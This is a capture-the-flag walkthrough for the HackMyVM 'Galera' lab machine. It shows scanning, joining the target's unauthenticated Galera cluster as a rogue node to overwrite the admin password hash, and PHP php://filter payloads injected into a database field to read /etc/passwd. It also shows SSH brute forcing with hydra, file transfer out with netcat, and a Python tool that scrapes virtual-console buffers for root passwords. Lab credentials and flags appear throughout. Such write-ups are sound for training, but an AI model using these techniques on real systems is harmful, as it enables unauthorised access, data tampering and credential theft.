HackMyVM-Galera-Walkthrough
城南花已开

Information gathering

Service detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.193 08:00:27:c9:34:bd PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fd:a3:7d VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.096 seconds (122.14 hosts/sec). 4 responded
export ip=192.168.60.193
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.193:22
Open 192.168.60.193:80
Open 192.168.60.193:4567
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 15:59 CST
Initiating ARP Ping Scan at 15:59
Scanning 192.168.60.193 [1 port]
Completed ARP Ping Scan at 15:59, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 192.168.60.193 [3 ports]
Discovered open port 80/tcp on 192.168.60.193
Discovered open port 4567/tcp on 192.168.60.193
Discovered open port 22/tcp on 192.168.60.193
Completed SYN Stealth Scan at 15:59, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.193
Host is up, received arp-response (0.0012s latency).
Scanned at 2025-05-23 15:59:02 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
4567/tcp open tram syn-ack ttl 64
MAC Address: 08:00:27:C9:34:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
Raw packets sent: 4 (160B) | Rcvd: 8 (1.128KB)

Directory enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.193
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 302) [Size: 0] [--> /]
/info.php (Status: 200) [Size: 77326]
/index.php (Status: 200) [Size: 825]
/upload (Status: 301) [Size: 317] [--> http://192.168.60.193/upload/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/config.php (Status: 200) [Size: 0]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

Opening the site in a browser shows a login form.

There is also port 4567; connect to it with nc.

The reply is unreadable binary, and every reply appears to begin with the bytes 2400 0002:

❯ nc -vn $ip 4567
(UNKNOWN) [192.168.60.193] 4567 (?) open
$ZJz7g2Rf7Ufg.
❯ nc -vn $ip 4567
(UNKNOWN) [192.168.60.193] 4567 (?) open
$wQJJz7g2RhZ.7(b
❯ nc -vn $ip 4567|xxd
(UNKNOWN) [192.168.60.193] 4567 (?) open
00000000: 2400 0002 ba19 d617 0001 1000 d44a 927a $............J.z
00000010: 37ae 11f0 9d87 1e67 329e 5216 6eb1 1a12 7......g2.R.n...

00000020: 37b0 11f0 a230 c73a 6124 c463 7....0.:a$.c
❯ nc -vn $ip 4567|xxd
(UNKNOWN) [192.168.60.193] 4567 (?) open
00000000: 2400 0002 8d09 ade6 0001 1000 d44a 927a $............J.z
00000010: 37ae 11f0 9d87 1e67 329e 5216 71c0 91df 7......g2.R.q...
00000020: 37b0 11f0 b78b df77 af19 84fe 7......w....

No leads there yet. /info.php exposes phpinfo(), which among other things lists the PHP functions blocked by disable_functions.

Viewing the page source of the login form reveals a hidden token field. Removing type="hidden" in the browser's developer tools makes it visible, but it does not help with the login.

Galera cluster

Back to port 4567.

A hint from a chat group member: search for the machine's name. Galera is a synchronous multi-master replication library for MySQL/MariaDB (Galera Cluster), and 4567 is its default group-communication port.

The binary data returned by nc earlier fits this: Galera nodes talk to each other over their own group-communication protocol (gcomm) on that port. By default gcomm performs no authentication and no encryption, so any host that can reach 4567 can present itself as a cluster node.

The plan is therefore to pose as a Galera node and join the cluster. Once state transfer completes we hold a replica of the target's databases, and every write we make is replicated back, so we can overwrite the web application's password hash and log in through the form.

First install MariaDB with the Galera provider, edit the configuration, and bootstrap a single-node cluster locally. One caveat: the gcomm handshake compares the cluster name, so if the target used a non-default wsrep_cluster_name the join fails until the names match (the default is fine here):

sudo vi /etc/mysql/conf.d/mysql.cnf
[mysqld]
# Galera Cluster Settings (Crucial for joining)
wsrep_on = ON
wsrep_provider = /usr/lib/galera/libgalera_smm.so
wsrep_cluster_address = "gcomm://"
wsrep_node_address = "192.168.60.100:4567"
wsrep_node_name = "my_evil_node"

# Port settings: keep the MariaDB client port separate from Galera's 4567, and make sure the target cluster can reach this node
bind-address = 0.0.0.0
port = 3306

binlog_format=ROW
default_storage_engine=InnoDB
innodb_autoinc_lock_mode=2
innodb_flush_log_at_trx_commit=0
sudo systemctl stop mariadb
sudo galera_new_cluster

Then change wsrep_cluster_address to the target's IP so the node joins the existing Galera cluster, and restart mariadb:

sudo vim /etc/mysql/conf.d/mysql.cnf
…………………………
wsrep_cluster_address = "gcomm://192.168.60.193"
…………………………
sudo systemctl restart mariadb

Connecting to the local database now shows that a galeradb database has been replicated over:

❯ mysql -u root -padmin
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 11.4.3-MariaDB-1 Debian n/a

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| galeradb |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.001 sec)
MariaDB [(none)]> use galeradb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [galeradb]> show tables;
+--------------------+
| Tables_in_galeradb |
+--------------------+
| users |
+--------------------+
1 row in set (0.000 sec)

MariaDB [galeradb]> select * from users;
+----+----------+------------------+--------------------------------------------------------------+---------------------+
| id | username | email | password | created_at |
+----+----------+------------------+--------------------------------------------------------------+---------------------+
| 1 | admin | [email protected] | $2y$10$BCAQ6VSNOL9TzfE5/dnVmuc9R5PotwClWAHwRdRAt7RM0d9miJRzq | 2025-05-05 07:55:51 |
+----+----------+------------------+--------------------------------------------------------------+---------------------+
1 row in set (0.000 sec)

MariaDB [galeradb]>

The stored hash is bcrypt ($2y$10$). Generate a bcrypt hash for a password of our choosing, update the row, and Galera replicates the change to the target immediately. PHP's password_verify() accepts the $2a$ and $2y$ bcrypt prefixes interchangeably, so a $2a$12$ hash produced by an external tool works fine.

MariaDB [galeradb]> update users set password = "$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522" where id = 1 ;
Query OK, 1 row affected (0.002 sec)
Rows matched: 1 Changed: 1 Warnings: 0

MariaDB [galeradb]> exit;
Bye

If the web login still fails after the update, restart mariadb and repeat the update. It is worth checking first that the local node is really part of the cluster when the write is issued: SHOW STATUS LIKE 'wsrep_local_state_comment' should report Synced and wsrep_cluster_size should be 2.

After logging in we can send messages and view the message history.

XSS in the message field is an obvious thing to try, but the payload is not interpreted.

PHP filter chain

Besides the messages themselves, the page also displays each sender's e-mail address.

Since we control the database, we can insert another user row whose e-mail field contains PHP code.

The phpinfo output showed that PHP may open files through URL wrappers, so a php://filter stream can be used to read /etc/passwd. (php://filter is accepted by include even when allow_url_include is Off; that setting only gates data:, php://input and remote URLs.)

<?php include 'php://filter/read=convert.base64-encode/resource=/etc/passwd'; ?>

MariaDB [galeradb]> INSERT INTO users (username, email, password, created_at) VALUES ('abc', "<?php include 'php://filter/read=convert.base64-encode/resource=/etc/passwd'; ?>", '$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522', NOW());
Query OK, 1 row affected (0.002 sec)

Log in, send any message and open the history:

Base64-decoding the output gives /etc/passwd; the only regular user is donjuandeaustria.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
donjuandeaustria:x:1000:1000:donjuandeaustria,,,:/home/donjuandeaustria:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false

Since a php://filter chain can read files, a filter chain for RCE should work too.

But a generated RCE filter chain is several kilobytes long, far more than the email column accepts, and nearly every useful function is in disable_functions anyway:

MariaDB [galeradb]> INSERT INTO users (username, email, password, created_at) VALUES ('aaa', "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7……………………………………|convert.base64-decode/resource=php://temp", '$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522'
ERROR 1406 (22001): Data too long for column 'email' at row 1

User privilege escalation

Nothing else to go on, so brute-force the SSH password (-e ns also tries the empty password and the username itself):

❯ hydra -l donjuandeaustria -P /usr/share/wordlists/rockyou.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-25 18:50:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.60.193:22/
[STATUS] 208.00 tries/min, 208 tries in 00:01h, 14344199 to do in 1149:23h, 10 active
[22][ssh] host: 192.168.60.193 login: donjuandeaustria password: amorcito
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-25 18:53:17

Credentials: donjuandeaustria:amorcito

Log in over SSH; the home directory contains donjuandeaustria.png:

❯ ssh donjuandeaustria@$ip
The authenticity of host '192.168.60.193 (192.168.60.193)' can't be established.
ED25519 key fingerprint is SHA256:i74LSOCZyaYgs80MUKyEspadufXaKwm+caBx6pcttAo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.193' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 8 00:14:56 2025 from 192.168.1.146
donjuandeaustria@galera:~$ ls -al
total 2056
drwx------ 2 donjuandeaustria donjuandeaustria 4096 May 8 00:12 .
drwxr-xr-x 3 root root 4096 May 4 19:17 ..
lrwxrwxrwx 1 donjuandeaustria donjuandeaustria 9 May 7 23:04 .bash_history -> /dev/null
-rw-r--r-- 1 donjuandeaustria donjuandeaustria 220 May 4 19:17 .bash_logout
-rw-r--r-- 1 donjuandeaustria donjuandeaustria 3558 May 7 23:48 .bashrc
-rw-r----- 1 root tty 2074781 May 8 00:04 donjuandeaustria.png
-rw------- 1 donjuandeaustria donjuandeaustria 20 May 8 00:12 .lesshst
-rw-r--r-- 1 donjuandeaustria donjuandeaustria 807 May 4 19:17 .profile
-rw-r----- 1 root donjuandeaustria 33 May 7 21:20 user.txt
donjuandeaustria@galera:~$ cat user.txt
072f9d8c26547db59e65d7aa3e55747b

The file is owned by root with group tty, and is readable only because our user is a member of that group.

There is no file binary on the target to identify it with, so transfer it to the attacker machine with nc:

❯ nc -lvp 4444 > donjuandeaustria.png
listening on [any] 4444 ...
192.168.60.193: inverse host lookup failed: Unknown host
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.193] 43582
----------------
donjuandeaustria@galera:~$ busybox nc 192.168.60.100 4444 < donjuandeaustria.png

It is a picture of a rabbit.

Analyze it with binwalk and carve it with foremost:

❯ binwalk donjuandeaustria.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 1024 x 1024, 8-bit/color RGB, non-interlaced
1195 0x4AB Certificate in DER format (x509 v3), header length: 4, sequence length: 819
2021 0x7E5 Certificate in DER format (x509 v3), header length: 4, sequence length: 1146
14398 0x383E JPEG image data, JFIF standard 1.02
65084 0xFE3C Certificate in DER format (x509 v3), header length: 4, sequence length: 819
65910 0x10176 Certificate in DER format (x509 v3), header length: 4, sequence length: 1146
78457 0x13279 Zlib compressed data, default compression
❯ foremost donjuandeaustria.png
Processing: donjuandeaustria.png
|*|

Nothing comes out of it. The binwalk hits (DER certificates, JPEG, zlib) inside a PNG are the usual false positives and embedded metadata, and the rabbit is presumably just a rabbit hole.

Root privilege escalation

A linpeas.sh run flags that root has a session on tty20; w confirms it:

donjuandeaustria@galera:~$ w
08:43:35 up 5:00, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty20 - 03:43 5:00m 0.00s ? -bash
donjuand pts/0 192.168.60.100 06:55 0.00s 0.10s 0.01s w

The id output also shows that the current user is a member of the tty and video groups:

donjuandeaustria@galera:~$ id
uid=1000(donjuandeaustria) gid=1000(donjuandeaustria) groups=1000(donjuandeaustria),5(tty),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

Looking up what these groups allow:

Members of video can read the raw framebuffer (/dev/fb0) and dump its pixel data to an image file.

To read what is on a text console as characters instead, members of tty can read /dev/vcsN (cat /dev/vcs20), although the output comes back without line breaks.

tty20 turns out to contain the root password saG58zJxs8crgQa366Uw:

donjuandeaustria@galera:~$ cat /dev/vcs20
…………………… [*] Machine: Galera [*] Platform: HackMyVM [*] Author: Lenam [*] IP: 192.168.60.193 galera login: root (automatic login) Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri May 23 03:54:55 EDT 2025 on tty20 ******************************************** Welcome, System Administrator! ******************************************** Reminder: your root password is 'saG58zJxs8crgQa366Uw' root@galera:~#

On Linux, text-mode virtual consoles expose their screen buffer through dedicated character devices, owned by root:tty, which is why tty group membership matters here:

  • /dev/vcsN (virtual console screen): the characters currently on console N, one byte per cell, with no line breaks and no attributes
  • /dev/vcsaN (virtual console screen with attributes): a 4-byte header giving the number of lines, the number of columns and the cursor x and y position, followed by one 16-bit cell per screen position holding the character and its attribute (colour, bold, blink, and so on)
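A parser for the /dev/vcsa layout just described (an added example, not part of the original write-up). It reads the 4-byte header, splits the cell stream into rows, recovers the line breaks that a plain cat of /dev/vcsN loses, and then looks for "password is '...'" reminders like the one on tty20. The sample screen is constructed here with a made-up password; read_console() is the only part that touches a real device and needs tty group membership or root. The cell byte order (character byte first, then attribute) assumes the little-endian x86 layout.

```python
import re
import struct

CRED_RE = re.compile(r"password\s+is\s+'([^']+)'", re.IGNORECASE)


def parse_vcsa(data):
    """Parse a /dev/vcsaN dump.

    vcs(4) layout: 4 header bytes (lines, columns, cursor x, cursor y), then one
    unsigned short per screen cell. On little-endian x86 each cell is stored as
    the character byte followed by the attribute byte.
    Returns (rows, cols, cursor_x, cursor_y, list_of_row_strings).
    """
    if len(data) < 4:
        raise ValueError("too short for a vcsa header")
    rows, cols, cur_x, cur_y = struct.unpack("4B", data[:4])
    cells = data[4:]
    if len(cells) < rows * cols * 2:
        raise ValueError(f"need {rows * cols * 2} cell bytes, got {len(cells)}")
    lines = []
    for r in range(rows):
        start = r * cols * 2
        chars = cells[start:start + cols * 2:2]   # every other byte: the characters
        lines.append(chars.decode("latin-1").rstrip())
    return rows, cols, cur_x, cur_y, lines


def build_vcsa(rows, cols, text_lines, attr=0x07, cursor=(0, 0)):
    """Inverse of parse_vcsa: build a constructed /dev/vcsa image for testing."""
    padded = (text_lines + [""] * rows)[:rows]
    out = bytearray(struct.pack("4B", rows, cols, cursor[0], cursor[1]))
    for line in padded:
        row = line.ljust(cols)[:cols].encode("latin-1")
        for ch in row:
            out += bytes((ch, attr))           # character byte, then attribute byte
    return bytes(out)


def find_password_reminders(lines):
    """Return every quoted value following 'password is' on the screen."""
    return [m.group(1) for line in lines for m in CRED_RE.finditer(line)]


def read_console(n):
    """Read the live screen of virtual console n (needs tty group or root)."""
    with open(f"/dev/vcsa{n}", "rb") as fh:
        return parse_vcsa(fh.read())


# Constructed sample mirroring the tty20 screen on this box, with a made-up password.
SAMPLE_LINES = [
    "galera login: root (automatic login)",
    "Last login: Fri May 23 03:54:55 EDT 2025 on tty20",
    " Welcome, System Administrator!",
    " Reminder: your root password is 'S3cret-Example'",
    "root@galera:~# ",
]
SAMPLE_VCSA = build_vcsa(25, 80, SAMPLE_LINES, cursor=(15, 4))

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        rows, cols, x, y, lines = read_console(int(sys.argv[1]))   # e.g. 20
    else:
        rows, cols, x, y, lines = parse_vcsa(SAMPLE_VCSA)
    print(f"{rows}x{cols} console, cursor at ({x}, {y})")
    print("\n".join(lines))
    for pw in find_password_reminders(lines):
        print(f"[!] password reminder on screen: {pw}")
```

Passing a console number reads the live device; with no argument it parses the constructed sample. Reading /dev/vcsa rather than /dev/vcs is what gives back the row structure, because the header tells the parser where each line ends.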

Switch to root with su directly:

donjuandeaustria@galera:~$ su root
Password:
root@galera:/home/donjuandeaustria# cd ~
root@galera:~# id
uid=0(root) gid=0(root) groups=0(root)
root@galera:~# cat root.txt
6a0d424c13321ca6e3b2deb2295fcc26

Postscript

The mechanism is root's ~/.profile: on every interactive root login it prints a welcome banner that includes the password.

As for why it fired on tty20: the captured screen shows "galera login: root (automatic login)", which is what agetty prints when started with --autologin, so root is logged in on tty20 automatically at boot rather than by someone typing the password at the console.

root@galera:~# cat .profile
# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
  if [ -f ~/.bashrc ]; then
    . ~/.bashrc
  fi
fi

mesg n 2> /dev/null || true


# Check that this is root and an interactive shell
if [ "$(id -u)" = "0" ] && [ -n "$PS1" ]; then
  # Keep everything the system already prints (last login, motd, etc.)
  # and then add your message in English:
  echo
  echo " ********************************************"
  echo " Welcome, System Administrator!"
  echo " ********************************************"
  echo
  # Password reminder:
  # Option A: put it in directly
  echo " Reminder: your root password is 'saG58zJxs8crgQa366Uw'"
  echo
fi